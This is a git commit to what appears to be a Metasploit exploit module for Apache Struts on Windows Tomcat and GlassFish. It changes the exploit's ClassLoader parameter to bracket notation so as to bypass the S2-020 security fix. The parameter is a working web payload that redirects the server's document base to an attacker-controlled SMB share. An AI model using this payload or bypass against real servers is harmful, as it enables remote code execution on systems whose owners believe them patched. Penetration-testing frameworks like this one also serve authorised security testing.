Use bypass for bulletin S2-020

This commit is contained in:
Julian Vilas
2015-03-07 19:14:20 +01:00
parent a13cd2bcb7
commit 3be2bde5a2
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win'
}
],
['Windows / Tomcat 6 & 7 (Remote SMB Resource)',
['Windows / Tomcat 6 & 7 and GlassFish 4 (Remote SMB Resource)',
{
'Arch' => ARCH_JAVA,
'Platform' => 'win'
@@ -235,7 +235,7 @@ class Metasploit3 < Msf::Exploit::Remote
'version' => '1.1',
'method' => 'GET',
'vars_get' => {
'class.classLoader.resources.dirContext.docBase' => "\\\\#{srvhost}\\#{share}"
'class[\'classLoader\'].resources.dirContext.docBase' => "\\\\#{srvhost}\\#{share}"
}
})
end